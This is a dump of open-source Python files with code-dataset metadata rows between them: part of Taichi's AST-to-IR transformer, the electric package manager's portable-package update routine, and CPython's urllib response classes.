if ASTTransformer.get_decorator(ctx, node) == 'static':
with ctx.static_scope_guard():
build_stmt(ctx, node.func)
build_stmts(ctx, node.args)
build_stmts(ctx, node.keywords)
else:
build_stmt(ctx, node.func)
build_stmts(ctx, node.args)
build_stmts(ctx, node.keywords)
args = []
for arg in node.args:
if isinstance(arg, ast.Starred):
args += arg.ptr
else:
args.append(arg.ptr)
keywords = dict(ChainMap(*[keyword.ptr for keyword in node.keywords]))
func = node.func.ptr
if isinstance(node.func, ast.Attribute) and isinstance(
node.func.value.ptr, str) and node.func.attr == 'format':
args.insert(0, node.func.value.ptr)
node.ptr = impl.ti_format(*args, **keywords)
elif ASTTransformer.build_call_if_is_builtin(node, args, keywords):
return node.ptr
node.ptr = func(*args, **keywords)
ASTTransformer.warn_if_is_external_func(ctx, node)
return node.ptr
@staticmethod
def build_FunctionDef(ctx, node):
args = node.args
assert args.vararg is None
assert args.kwonlyargs == []
assert args.kw_defaults == []
assert args.kwarg is None
def transform_as_kernel():
# Treat return type
if node.returns is not None:
kernel_arguments.decl_ret(ctx.func.return_type)
for i, arg in enumerate(args.args):
if isinstance(ctx.func.argument_annotations[i],
annotations.template):
continue
elif isinstance(ctx.func.argument_annotations[i],
linalg.sparse_matrix_builder):
ctx.create_variable(arg.arg,
kernel_arguments.decl_sparse_matrix())
elif isinstance(ctx.func.argument_annotations[i],
annotations.any_arr):
ctx.create_variable(
arg.arg,
kernel_arguments.decl_any_arr_arg(
to_taichi_type(ctx.arg_features[i][0]),
ctx.arg_features[i][1], ctx.arg_features[i][2],
ctx.arg_features[i][3]))
elif isinstance(ctx.func.argument_annotations[i], MatrixType):
ctx.global_vars[
arg.arg] = kernel_arguments.decl_matrix_arg(
ctx.func.argument_annotations[i])
else:
ctx.global_vars[
arg.arg] = kernel_arguments.decl_scalar_arg(
ctx.func.argument_annotations[i])
# remove original args
node.args.args = []
build_stmts(ctx, node.decorator_list)
if ctx.is_kernel: # ti.kernel
for decorator in node.decorator_list:
if decorator.ptr is kernel_impl.func:
raise TaichiSyntaxError(
"Function definition not allowed in 'ti.kernel'.")
transform_as_kernel()
else: # ti.func
for decorator in node.decorator_list:
if decorator.ptr is kernel_impl.func:
raise TaichiSyntaxError(
"Function definition not allowed in 'ti.func'.")
if impl.get_runtime().experimental_real_function:
transform_as_kernel()
else:
len_args = len(args.args)
len_default = len(args.defaults)
len_provided = len(ctx.argument_data)
len_minimum = len_args - len_default
if len_args < len_provided or len_args - len_default > len_provided:
if len(args.defaults):
raise TaichiSyntaxError(
f"Function receives {len_minimum} to {len_args} argument(s) and {len_provided} provided."
)
else:
raise TaichiSyntaxError(
f"Function receives {len_args} argument(s) and {len_provided} provided."
)
# Transform as force-inlined func
default_start = len_provided - len_minimum
ctx.argument_data = list(ctx.argument_data)
for arg in args.defaults[default_start:]:
ctx.argument_data.append(build_stmt(ctx, arg))
assert len(args.args) == len(ctx.argument_data)
for i, (arg,
data) in enumerate(zip(args.args, ctx.argument_data)):
# Remove annotations because they are not used.
args.args[i].annotation = None
# Template arguments are passed by reference.
if isinstance(ctx.func.argument_annotations[i],
annotations.template):
ctx.create_variable(ctx.func.argument_names[i], data)
continue
# Create a copy for non-template arguments,
# so that they are passed by value.
ctx.create_variable(arg.arg, impl.expr_init_func(data))
with ctx.variable_scope_guard():
build_stmts(ctx, node.body)
return None
@staticmethod
def build_Return(ctx, node):
if not impl.get_runtime().experimental_real_function:
if ctx.is_in_non_static_control_flow():
raise TaichiSyntaxError(
"Return inside non-static if/for is not supported")
build_stmt(ctx, node.value)
if ctx.is_kernel or impl.get_runtime().experimental_real_function:
# TODO: check if it's at the end of a kernel, throw TaichiSyntaxError if not
if node.value is not None:
if ctx.func.return_type is None:
raise TaichiSyntaxError(
f'A {"kernel" if ctx.is_kernel else "function"} '
'with a return value must be annotated '
'with a return type, e.g. def func() -> ti.f32')
_ti_core.create_kernel_exprgroup_return(
expr.make_expr_group(
ti_ops.cast(expr.Expr(node.value.ptr),
ctx.func.return_type).ptr))
# For args[0], it is an ast.Attribute, because it loads the
# attribute, |ptr|, of the expression |ret_expr|. Therefore we
# only need to replace the object part, i.e. args[0].value
else:
ctx.return_data = node.value.ptr
if not impl.get_runtime().experimental_real_function:
ctx.returned = True
return None
@staticmethod
def build_Module(ctx, node):
with ctx.variable_scope_guard():
# Do NOT use |build_stmts| which inserts 'del' statements to the
# end and deletes parameters passed into the module
for stmt in node.body:
build_stmt(ctx, stmt)
return None
@staticmethod
def build_Attribute(ctx, node):
build_stmt(ctx, node.value)
node.ptr = getattr(node.value.ptr, node.attr)
return node.ptr
@staticmethod
def build_BinOp(ctx, node):
build_stmt(ctx, node.left)
build_stmt(ctx, node.right)
op = {
ast.Add: lambda l, r: l + r,
ast.Sub: lambda l, r: l - r,
ast.Mult: lambda l, r: l * r,
ast.Div: lambda l, r: l / r,
ast.FloorDiv: lambda l, r: l // r,
ast.Mod: lambda l, r: l % r,
ast.Pow: lambda l, r: l**r,
ast.LShift: lambda l, r: l << r,
ast.RShift: lambda l, r: l >> r,
ast.BitOr: lambda l, r: l | r,
ast.BitXor: lambda l, r: l ^ r,
ast.BitAnd: lambda l, r: l & r,
ast.MatMult: lambda l, r: l @ r,
}.get(type(node.op))
node.ptr = op(node.left.ptr, node.right.ptr)
return node.ptr
@staticmethod
def build_AugAssign(ctx, node):
build_stmt(ctx, node.target)
build_stmt(ctx, node.value)
node.ptr = node.target.ptr.augassign(node.value.ptr,
type(node.op).__name__)
return node.ptr
@staticmethod
def build_UnaryOp(ctx, node):
build_stmt(ctx, node.operand)
op = {
ast.UAdd: lambda l: l,
ast.USub: lambda l: -l,
ast.Not: ti_ops.logical_not,
ast.Invert: lambda l: ~l,
}.get(type(node.op))
node.ptr = op(node.operand.ptr)
return node.ptr
@staticmethod
def build_short_circuit_and(operands):
if len(operands) == 1:
return operands[0].ptr
val = impl.expr_init(None)
lhs = operands[0].ptr
impl.begin_frontend_if(lhs)
_ti_core.begin_frontend_if_true()
rhs = ASTTransformer.build_short_circuit_and(operands[1:])
val.assign(rhs)
_ti_core.pop_scope()
_ti_core.begin_frontend_if_false()
val.assign(0)
_ti_core.pop_scope()
return val
@staticmethod
def build_short_circuit_or(operands):
if len(operands) == 1:
return operands[0].ptr
val = impl.expr_init(None)
lhs = operands[0].ptr
impl.begin_frontend_if(lhs)
_ti_core.begin_frontend_if_true()
val.assign(1)
_ti_core.pop_scope()
_ti_core.begin_frontend_if_false()
rhs = ASTTransformer.build_short_circuit_or(operands[1:])
val.assign(rhs)
_ti_core.pop_scope()
return val
@staticmethod
def build_normal_bool_op(op):
def inner(operands):
result = op(operands[0].ptr, operands[1].ptr)
for i in range(2, len(operands)):
result = op(result, operands[i].ptr)
return result
return inner
@staticmethod
def build_static_short_circuit_and(operands):
for operand in operands:
if not operand.ptr:
return operand.ptr
return operands[-1].ptr
@staticmethod
def build_static_short_circuit_or(operands):
for operand in operands:
if operand.ptr:
return operand.ptr
return operands[-1].ptr
@staticmethod
def build_BoolOp(ctx, node):
build_stmts(ctx, node.values)
if ctx.is_in_static_scope():
ops = {
ast.And: ASTTransformer.build_static_short_circuit_and,
ast.Or: ASTTransformer.build_static_short_circuit_or,
}
elif impl.get_runtime().short_circuit_operators:
ops = {
ast.And: ASTTransformer.build_short_circuit_and,
ast.Or: ASTTransformer.build_short_circuit_or,
}
else:
ops = {
ast.And:
ASTTransformer.build_normal_bool_op(ti_ops.logical_and),
ast.Or: ASTTransformer.build_normal_bool_op(ti_ops.logical_or),
}
op = ops.get(type(node.op))
node.ptr = op(node.values)
return node.ptr
@staticmethod
def build_Compare(ctx, node):
build_stmt(ctx, node.left)
build_stmts(ctx, node.comparators)
ops = {
ast.Eq: lambda l, r: l == r,
ast.NotEq: lambda l, r: l != r,
ast.Lt: lambda l, r: l < r,
ast.LtE: lambda l, r: l <= r,
ast.Gt: lambda l, r: l > r,
ast.GtE: lambda l, r: l >= r,
}
ops_static = {
ast.In: lambda l, r: l in r,
ast.NotIn: lambda l, r: l not in r,
}
if ctx.is_in_static_scope():
ops = {**ops, **ops_static}
operands = [node.left.ptr
] + [comparator.ptr for comparator in node.comparators]
val = True
for i, node_op in enumerate(node.ops):
l = operands[i]
r = operands[i + 1]
op = ops.get(type(node_op))
if op is None:
if type(node_op) in ops_static:
raise TaichiSyntaxError(
f'"{type(node_op).__name__}" is only supported inside `ti.static`.'
)
else:
raise TaichiSyntaxError(
f'"{type(node_op).__name__}" is not supported in Taichi kernels.'
)
val = ti_ops.logical_and(val, op(l, r))
node.ptr = val
return node.ptr
@staticmethod
def get_decorator(ctx, node):
if not isinstance(node, ast.Call):
return ''
for wanted, name in [
(impl.static, 'static'),
(impl.grouped, 'grouped'),
(ndrange, 'ndrange'),
]:
if ASTResolver.resolve_to(node.func, wanted, ctx.global_vars):
return name
return ''
@staticmethod
def get_for_loop_targets(node):
"""
Returns the list of indices of the for loop |node|.
See also: https://docs.python.org/3/library/ast.html#ast.For
"""
if isinstance(node.target, ast.Name):
return [node.target.id]
assert isinstance(node.target, ast.Tuple)
return [name.id for name in node.target.elts]
@staticmethod
def build_static_for(ctx, node, is_grouped):
if is_grouped:
assert len(node.iter.args[0].args) == 1
ndrange_arg = build_stmt(ctx, node.iter.args[0].args[0])
if not isinstance(ndrange_arg, ndrange):
raise TaichiSyntaxError(
"Only 'ti.ndrange' is allowed in 'ti.static(ti.grouped(...))'."
)
targets = ASTTransformer.get_for_loop_targets(node)
if len(targets) != 1:
raise TaichiSyntaxError(
f"Group for should have 1 loop target, found {len(targets)}"
)
target = targets[0]
for value in impl.grouped(ndrange_arg):
with ctx.variable_scope_guard():
ctx.create_variable(target, value)
build_stmts(ctx, node.body)
status = ctx.loop_status()
if status == LoopStatus.Break:
break
elif status == LoopStatus.Continue:
ctx.set_loop_status(LoopStatus.Normal)
else:
build_stmt(ctx, node.iter)
targets = ASTTransformer.get_for_loop_targets(node)
for target_values in node.iter.ptr:
if not isinstance(
target_values,
collections.abc.Sequence) or len(targets) == 1:
target_values = [target_values]
with ctx.variable_scope_guard():
for target, target_value in zip(targets, target_values):
ctx.create_variable(target, target_value)
build_stmts(ctx, node.body)
status = ctx.loop_status()
if status == LoopStatus.Break:
break
elif status == LoopStatus.Continue:
ctx.set_loop_status(LoopStatus.Normal)
return None
@staticmethod
def build_range_for(ctx, node):
with ctx.variable_scope_guard():
loop_name = node.target.id
ctx.check_loop_var(loop_name)
loop_var = expr.Expr(_ti_core.make_id_expr(''))
ctx.create_variable(loop_name, loop_var)
if len(node.iter.args) not in [1, 2]:
raise TaichiSyntaxError(
f"Range should have 1 or 2 arguments, found {len(node.iter.args)}"
)
if len(node.iter.args) == 2:
begin = ti_ops.cast(
expr.Expr(build_stmt(ctx, node.iter.args[0])),
primitive_types.i32)
end = ti_ops.cast(
expr.Expr(build_stmt(ctx, node.iter.args[1])),
primitive_types.i32)
else:
begin = ti_ops.cast(expr.Expr(0), primitive_types.i32)
end = ti_ops.cast(
expr.Expr(build_stmt(ctx, node.iter.args[0])),
primitive_types.i32)
_ti_core.begin_frontend_range_for(loop_var.ptr, begin.ptr, end.ptr)
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_ndrange_for(ctx, node):
with ctx.variable_scope_guard():
ndrange_var = impl.expr_init(build_stmt(ctx, node.iter))
ndrange_begin = ti_ops.cast(expr.Expr(0), primitive_types.i32)
ndrange_end = ti_ops.cast(
expr.Expr(impl.subscript(ndrange_var.acc_dimensions, 0)),
primitive_types.i32)
ndrange_loop_var = expr.Expr(_ti_core.make_id_expr(''))
_ti_core.begin_frontend_range_for(ndrange_loop_var.ptr,
ndrange_begin.ptr,
ndrange_end.ptr)
I = impl.expr_init(ndrange_loop_var)
targets = ASTTransformer.get_for_loop_targets(node)
for i, target in enumerate(targets):
if i + 1 < len(targets):
target_tmp = impl.expr_init(
I // ndrange_var.acc_dimensions[i + 1])
else:
target_tmp = impl.expr_init(I)
ctx.create_variable(
target,
impl.expr_init(target_tmp + impl.subscript(
impl.subscript(ndrange_var.bounds, i), 0)))
if i + 1 < len(targets):
I.assign(I -
target_tmp * ndrange_var.acc_dimensions[i + 1])
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_grouped_ndrange_for(ctx, node):
with ctx.variable_scope_guard():
ndrange_var = impl.expr_init(build_stmt(ctx, node.iter.args[0]))
ndrange_begin = ti_ops.cast(expr.Expr(0), primitive_types.i32)
ndrange_end = ti_ops.cast(
expr.Expr(impl.subscript(ndrange_var.acc_dimensions, 0)),
primitive_types.i32)
ndrange_loop_var = expr.Expr(_ti_core.make_id_expr(''))
_ti_core.begin_frontend_range_for(ndrange_loop_var.ptr,
ndrange_begin.ptr,
ndrange_end.ptr)
targets = ASTTransformer.get_for_loop_targets(node)
if len(targets) != 1:
raise TaichiSyntaxError(
f"Group for should have 1 loop target, found {len(targets)}"
)
target = targets[0]
target_var = impl.expr_init(
matrix.Vector([0] * len(ndrange_var.dimensions),
dt=primitive_types.i32))
ctx.create_variable(target, target_var)
I = impl.expr_init(ndrange_loop_var)
for i in range(len(ndrange_var.dimensions)):
if i + 1 < len(ndrange_var.dimensions):
target_tmp = I // ndrange_var.acc_dimensions[i + 1]
else:
target_tmp = I
impl.subscript(target_var,
i).assign(target_tmp + ndrange_var.bounds[i][0])
if i + 1 < len(ndrange_var.dimensions):
I.assign(I -
target_tmp * ndrange_var.acc_dimensions[i + 1])
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_struct_for(ctx, node, is_grouped):
# for i, j in x
# for I in ti.grouped(x)
targets = ASTTransformer.get_for_loop_targets(node)
for target in targets:
ctx.check_loop_var(target)
with ctx.variable_scope_guard():
if is_grouped:
if len(targets) != 1:
raise TaichiSyntaxError(
f"Group for should have 1 loop target, found {len(targets)}"
)
target = targets[0]
loop_var = build_stmt(ctx, node.iter)
loop_indices = expr.make_var_list(size=len(loop_var.shape))
expr_group = expr.make_expr_group(loop_indices)
impl.begin_frontend_struct_for(expr_group, loop_var)
ctx.create_variable(
target, matrix.Vector(loop_indices,
dt=primitive_types.i32))
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
else:
_vars = []
for name in targets:
var = expr.Expr(_ti_core.make_id_expr(""))
_vars.append(var)
ctx.create_variable(name, var)
loop_var = node.iter.ptr
expr_group = expr.make_expr_group(*_vars)
impl.begin_frontend_struct_for(expr_group, loop_var)
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_mesh_for(ctx, node):
targets = ASTTransformer.get_for_loop_targets(node)
if len(targets) != 1:
raise TaichiSyntaxError(
"Mesh for should have 1 loop target, found {len(targets)}")
target = targets[0]
with ctx.variable_scope_guard():
var = expr.Expr(_ti_core.make_id_expr(""))
ctx.mesh = node.iter.ptr.mesh
assert isinstance(ctx.mesh, impl.MeshInstance)
mesh_idx = mesh.MeshElementFieldProxy(ctx.mesh,
node.iter.ptr._type, var.ptr)
ctx.create_variable(target, mesh_idx)
_ti_core.begin_frontend_mesh_for(mesh_idx.ptr, ctx.mesh.mesh_ptr,
node.iter.ptr._type)
build_stmts(ctx, node.body)
ctx.mesh = None
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_nested_mesh_for(ctx, node):
targets = ASTTransformer.get_for_loop_targets(node)
if len(targets) != 1:
raise TaichiSyntaxError(
"Nested-mesh for should have 1 loop target, found {len(targets)}"
)
target = targets[0]
with ctx.variable_scope_guard():
ctx.mesh = node.iter.ptr.mesh
assert isinstance(ctx.mesh, impl.MeshInstance)
loop_name = node.target.id + '_index__'
loop_var = expr.Expr(_ti_core.make_id_expr(''))
ctx.create_variable(loop_name, loop_var)
begin = expr.Expr(0)
end = node.iter.ptr.size
_ti_core.begin_frontend_range_for(loop_var.ptr, begin.ptr, end.ptr)
entry_expr = _ti_core.get_relation_access(
ctx.mesh.mesh_ptr, node.iter.ptr.from_index.ptr,
node.iter.ptr.to_element_type, loop_var.ptr)
entry_expr.type_check()
mesh_idx = mesh.MeshElementFieldProxy(
ctx.mesh, node.iter.ptr.to_element_type, entry_expr)
ctx.create_variable(target, mesh_idx)
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_For(ctx, node):
if node.orelse:
raise TaichiSyntaxError(
"'else' clause for 'for' not supported in Taichi kernels")
decorator = ASTTransformer.get_decorator(ctx, node.iter)
double_decorator = ''
if decorator != '' and len(node.iter.args) == 1:
double_decorator = ASTTransformer.get_decorator(
ctx, node.iter.args[0])
if decorator == 'static':
if double_decorator == 'static':
raise TaichiSyntaxError("'ti.static' cannot be nested")
with ctx.loop_scope_guard(is_static=True):
return ASTTransformer.build_static_for(
ctx, node, double_decorator == 'grouped')
with ctx.loop_scope_guard():
if decorator == 'ndrange':
if double_decorator != '':
raise TaichiSyntaxError(
"No decorator is allowed inside 'ti.ndrange")
return ASTTransformer.build_ndrange_for(ctx, node)
if decorator == 'grouped':
if double_decorator == 'static':
raise TaichiSyntaxError(
"'ti.static' is not allowed inside 'ti.grouped'")
elif double_decorator == 'ndrange':
return ASTTransformer.build_grouped_ndrange_for(ctx, node)
elif double_decorator == 'grouped':
raise TaichiSyntaxError("'ti.grouped' cannot be nested")
else:
return ASTTransformer.build_struct_for(ctx,
node,
is_grouped=True)
elif isinstance(node.iter, ast.Call) and isinstance(
node.iter.func, ast.Name) and node.iter.func.id == 'range':
return ASTTransformer.build_range_for(ctx, node)
else:
build_stmt(ctx, node.iter)
if isinstance(node.iter.ptr, mesh.MeshElementField):
if not _ti_core.is_extension_supported(
impl.default_cfg().arch, _ti_core.Extension.mesh):
raise Exception(
'Backend ' + str(impl.default_cfg().arch) +
' doesn\'t support MeshTaichi extension')
return ASTTransformer.build_mesh_for(ctx, node)
if isinstance(node.iter.ptr, mesh.MeshRelationAccessProxy):
return ASTTransformer.build_nested_mesh_for(ctx, node)
# Struct for
return ASTTransformer.build_struct_for(ctx,
node,
is_grouped=False)
@staticmethod
def build_While(ctx, node):
if node.orelse:
raise TaichiSyntaxError(
"'else' clause for 'while' not supported in Taichi kernels")
with ctx.loop_scope_guard():
_ti_core.begin_frontend_while(expr.Expr(1).ptr)
while_cond = build_stmt(ctx, node.test)
impl.begin_frontend_if(while_cond)
_ti_core.begin_frontend_if_true()
_ti_core.pop_scope()
_ti_core.begin_frontend_if_false()
_ti_core.insert_break_stmt()
_ti_core.pop_scope()
build_stmts(ctx, node.body)
_ti_core.pop_scope()
return None
@staticmethod
def build_If(ctx, node):
build_stmt(ctx, node.test)
is_static_if = (ASTTransformer.get_decorator(ctx,
node.test) == "static")
if is_static_if:
if node.test.ptr:
build_stmts(ctx, node.body)
else:
build_stmts(ctx, node.orelse)
return node
with ctx.non_static_control_flow_guard():
impl.begin_frontend_if(node.test.ptr)
_ti_core.begin_frontend_if_true()
build_stmts(ctx, node.body)
_ti_core.pop_scope()
_ti_core.begin_frontend_if_false()
build_stmts(ctx, node.orelse)
_ti_core.pop_scope()
return None
@staticmethod
def build_Expr(ctx, node):
if not isinstance(
node.value,
ast.Call) or not impl.get_runtime().experimental_real_function:
build_stmt(ctx, node.value)
return None
args = [build_stmt(ctx, node.value.func)
] + [arg.ptr for arg in build_stmts(ctx, node.value.args)]
impl.insert_expr_stmt_if_ti_func(*args)
return None
@staticmethod
def build_IfExp(ctx, node):
build_stmt(ctx, node.test)
build_stmt(ctx, node.body)
build_stmt(ctx, node.orelse)
if is_taichi_class(node.test.ptr) or is_taichi_class(
node.body.ptr) or is_taichi_class(node.orelse.ptr):
node.ptr = ti_ops.select(node.test.ptr, node.body.ptr,
node.orelse.ptr)
return node.ptr
is_static_if = (ASTTransformer.get_decorator(ctx,
node.test) == "static")
if is_static_if:
if node.test.ptr:
node.ptr = build_stmt(ctx, node.body)
else:
node.ptr = build_stmt(ctx, node.orelse)
return node.ptr
val = impl.expr_init(None)
impl.begin_frontend_if(node.test.ptr)
_ti_core.begin_frontend_if_true()
val.assign(node.body.ptr)
_ti_core.pop_scope()
_ti_core.begin_frontend_if_false()
val.assign(node.orelse.ptr)
_ti_core.pop_scope()
node.ptr = val
return node.ptr
@staticmethod
def _is_string_mod_args(msg):
# 1. str % (a, b, c, ...)
# 2. str % single_item
# Note that |msg.right| may not be a tuple.
if not isinstance(msg, ast.BinOp):
return False
if not isinstance(msg.op, ast.Mod):
return False
if isinstance(msg.left, ast.Str):
return True
if isinstance(msg.left, ast.Constant) and isinstance(
msg.left.value, str):
return True
return False
@staticmethod
def _handle_string_mod_args(ctx, node):
msg = build_stmt(ctx, node.left)
args = build_stmt(ctx, node.right)
if not isinstance(args, collections.abc.Sequence):
args = (args, )
return msg, args
@staticmethod
def build_Assert(ctx, node):
extra_args = []
if node.msg is not None:
if isinstance(node.msg, ast.Constant):
msg = node.msg.value
elif isinstance(node.msg, ast.Str):
msg = node.msg.s
elif ASTTransformer._is_string_mod_args(node.msg):
msg, extra_args = ASTTransformer._handle_string_mod_args(
ctx, node.msg)
else:
raise ValueError(
f"assert info must be constant, not {ast.dump(node.msg)}")
else:
msg = astor.to_source(node.test)
test = build_stmt(ctx, node.test)
impl.ti_assert(test, msg.strip(), extra_args)
return None
@staticmethod
def build_Break(ctx, node):
if ctx.is_in_static_for():
ctx.set_loop_status(LoopStatus.Break)
else:
_ti_core.insert_break_stmt()
return None
@staticmethod
def build_Continue(ctx, node):
if ctx.is_in_static_for():
ctx.set_loop_status(LoopStatus.Continue)
else:
_ti_core.insert_continue_stmt()
return None
@staticmethod
def build_Pass(ctx, node):
return None
@staticmethod
def build_Raise(ctx, node):
raise build_stmt(ctx, node.exc)
build_stmt = ASTTransformer()
def build_stmts(ctx, stmts):
with ctx.variable_scope_guard():
for stmt in stmts:
if ctx.returned or ctx.loop_status() != LoopStatus.Normal:
break
else:
build_stmt(ctx, stmt)
return stmts
| 38.42311
| 117
| 0.554882
|
4a143a5a5fe163a09a02c538e2ad5a51f82788de
| 6,056
|
py
|
Python
|
src/zip_update.py
|
fullstackslayer/electric
|
de2bcda568284fd054815ecfaaa8d95a026c61f9
|
[
"Apache-2.0"
] | 2
|
2021-05-16T06:54:13.000Z
|
2021-07-04T08:36:38.000Z
|
src/zip_update.py
|
vidhyanijadala/electric
|
de2bcda568284fd054815ecfaaa8d95a026c61f9
|
[
"Apache-2.0"
] | null | null | null |
src/zip_update.py
|
vidhyanijadala/electric
|
de2bcda568284fd054815ecfaaa8d95a026c61f9
|
[
"Apache-2.0"
] | 1
|
2021-07-02T13:30:39.000Z
|
2021-07-02T13:30:39.000Z
|
import json
from json.decoder import JSONDecodeError
import requests
from Classes.Metadata import Metadata
from Classes.PortablePacket import PortablePacket
from extension import write
from colorama import Fore
from zip_utils import *
import os
import sys
home = os.path.expanduser('~')
def update_portable(ctx, packet: PortablePacket, metadata: Metadata):
import shutil
import click
from difflib import get_close_matches
write(f'Updating [ {Fore.LIGHTCYAN_EX}{packet.display_name}{Fore.RESET} ]', 'white', metadata)
options = os.listdir(rf'{home}\electric')
matches = get_close_matches(rf'{home}\electric\{packet.json_name}@{packet.latest_version}', options)
if len(matches) == 1:
# similar package exists and we need to get the version of the currently installed package.
current_version = matches[0].split('@')[-1].replace('.json', '')
if current_version != packet.latest_version:
write(f'{packet.display_name} Will Be Updated From ({current_version}) => ({packet.latest_version})', 'green', metadata)
write('Requesting Currently Installed Version', 'yellow', metadata)
REQA = 'https://raw.githubusercontent.com/electric-package-manager/electric-packages/master/packages/'
try:
response = requests.get(REQA + packet.json_name + '.json', timeout=5)
except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout):
click.echo(click.style(
f'Failed to request {packet.json_name}.json from raw.githubusercontent.com', 'red'))
sys.exit()
try:
res = json.loads(response.text)
except JSONDecodeError:
click.echo(click.style(f'{packet.json_name} not found!', 'red'))
sys.exit()
pkg = res
pkg = pkg['portable']
keys = list(pkg[current_version].keys())
data = {
'display-name': res['display-name'],
'package-name': res['package-name'],
'latest-version': res['latest-version'],
'url': pkg[current_version]['url'],
'file-type': pkg[current_version]['file-type'] if 'file-type' in keys else None,
'extract-dir': res['package-name'],
'chdir': pkg[current_version]['chdir'] if 'chdir' in keys else [],
'bin': pkg[current_version]['bin'] if 'bin' in keys else [],
'shortcuts': pkg[current_version]['shortcuts'] if 'shortcuts' in keys else [],
'pre-install': pkg[current_version]['pre-install'] if 'pre-install' in keys else [],
'post-install': pkg[current_version]['post-install'] if 'post-install' in keys else [],
'install-notes': pkg[current_version]['install-notes'] if 'install-notes' in keys else None,
'uninstall-notes': pkg[current_version]['uninstall-notes'] if 'uninstall-notes' in keys else None,
'set-env': pkg[current_version]['set-env'] if 'set-env' in keys else None,
'persist': pkg[current_version]['persist'] if 'persist' in keys else None,
'checksum': pkg[current_version]['checksum'] if 'checksum' in keys else None,
'dependencies': pkg[current_version]['dependencies'] if 'dependencies' in keys else None,
}
old_packet = PortablePacket(data)
# continue updating the package
# if a directory has to be saved before uninstallation and installation of the portable
if old_packet.persist:
install_directory = rf'{home}\electric\{old_packet.json_name}@{current_version}\\'
if old_packet.chdir:
install_directory += old_packet.chdir + '\\'
install_directory = install_directory.replace('\\\\', '\\')
if isinstance(old_packet.persist, list):
for path in old_packet.persist:
# multiple directories to backup
try:
shutil.copytree(install_directory + path, rf'{home}\electric\Persist\{old_packet.json_name}@{current_version}\{path}')
except FileExistsError:
pass
else:
# only 1 directory to backup
if old_packet.persist:
try:
shutil.copytree(install_directory + old_packet.persist, rf'{home}\electric\Persist\{old_packet.json_name}@{current_version}\{old_packet.persist}')
except FileExistsError:
pass
os.system(f'electric uninstall {packet.json_name} --portable')
os.system(f'electric install {packet.json_name} --portable')
new_install_dir = rf'{home}\electric\{packet.json_name}@{packet.latest_version}\\'
if packet.chdir:
new_install_dir += packet.chdir + '\\'
new_install_dir = new_install_dir.replace('\\\\', '\\')
if old_packet.persist:
write('Restoring Old Files And Data', 'green', metadata)
if isinstance(old_packet.persist, list):
for path in old_packet.persist:
shutil.rmtree(new_install_dir + path)
shutil.copytree(rf'{home}\electric\Persist\{old_packet.json_name}@{current_version}\{path}', new_install_dir + path)
else:
shutil.rmtree(new_install_dir.replace('\\\\', '\\') + old_packet.persist.replace('\\\\', '\\'))
shutil.copytree(rf'{home}\electric\Persist\{old_packet.json_name}@{current_version}\{old_packet.persist}', new_install_dir + old_packet.persist)
# completed backup of files to backups directory
write(rf'Successfully Completed Backup Of Required Data To {home}\electric\Persist', 'cyan', metadata)
else:
write(f'Could not find any existing installations of {packet.display_name}', 'red', metadata)
write(f'Successfully Updated {packet.display_name}', 'bright_magenta', metadata)
sys.exit()
| 46.584615
| 170
| 0.619551
|
4a143b03e676b27fbba0d9cb0105d34df3ae2dd3
| 2,188
|
py
|
Python
|
bin/Lib/urllib/response.py
|
yousafsyed/casperjs
|
ed077ae9e42cf8fb9e023e9b6840d3cea11bac40
|
[
"MIT"
] | 36
|
2015-02-04T10:43:31.000Z
|
2022-03-30T13:01:12.000Z
|
bin/Lib/urllib/response.py
|
yousafsyed/casperjs
|
ed077ae9e42cf8fb9e023e9b6840d3cea11bac40
|
[
"MIT"
] | 9
|
2015-03-17T05:56:16.000Z
|
2021-11-17T09:31:50.000Z
|
bin/Lib/urllib/response.py
|
yousafsyed/casperjs
|
ed077ae9e42cf8fb9e023e9b6840d3cea11bac40
|
[
"MIT"
] | 22
|
2015-05-13T17:37:35.000Z
|
2022-01-25T06:24:42.000Z
|
"""Response classes used by urllib.
The base class, addbase, defines a minimal file-like interface,
including read() and readline(). The typical response object is an
addinfourl instance, which defines an info() method that returns
headers and a geturl() method that returns the url.
"""
import tempfile
__all__ = ['addbase', 'addclosehook', 'addinfo', 'addinfourl']
class addbase(tempfile._TemporaryFileWrapper):
"""Base class for addinfo and addclosehook. Is a good idea for garbage collection."""
# XXX Add a method to expose the timeout on the underlying socket?
def __init__(self, fp):
super(addbase, self).__init__(fp, '<urllib response>', delete=False)
# Keep reference around as this was part of the original API.
self.fp = fp
def __repr__(self):
return '<%s at %r whose fp = %r>' % (self.__class__.__name__,
id(self), self.file)
def __enter__(self):
if self.fp.closed:
raise ValueError("I/O operation on closed file")
return self
def __exit__(self, type, value, traceback):
self.close()
class addclosehook(addbase):
"""Class to add a close hook to an open file."""
def __init__(self, fp, closehook, *hookargs):
super(addclosehook, self).__init__(fp)
self.closehook = closehook
self.hookargs = hookargs
def close(self):
if self.closehook:
self.closehook(*self.hookargs)
self.closehook = None
self.hookargs = None
super(addclosehook, self).close()
class addinfo(addbase):
"""class to add an info() method to an open file."""
def __init__(self, fp, headers):
super(addinfo, self).__init__(fp)
self.headers = headers
def info(self):
return self.headers
class addinfourl(addinfo):
"""class to add info() and geturl() methods to an open file."""
def __init__(self, fp, headers, url, code=None):
super(addinfourl, self).__init__(fp, headers)
self.url = url
self.code = code
def getcode(self):
return self.code
def geturl(self):
return self.url
| 28.415584
| 89
| 0.632541
|
4a143b684f319f7ad8e64fc1116d1e09fce8109a
| 81
|
py
|
Python
|
FusionIIIT/applications/ps1/apps.py
|
sabhishekpratap5/sonarcubeTest2
|
9bd8105e457f6feb8c38fa94b335e54783fca99e
|
[
"bzip2-1.0.6"
] | 29
|
2019-02-20T15:35:33.000Z
|
2022-03-22T11:10:57.000Z
|
FusionIIIT/applications/ps1/apps.py
|
sabhishekpratap5/sonarcubeTest2
|
9bd8105e457f6feb8c38fa94b335e54783fca99e
|
[
"bzip2-1.0.6"
] | 409
|
2019-01-17T19:30:51.000Z
|
2022-03-31T16:28:45.000Z
|
FusionIIIT/applications/ps1/apps.py
|
sabhishekpratap5/sonarcubeTest2
|
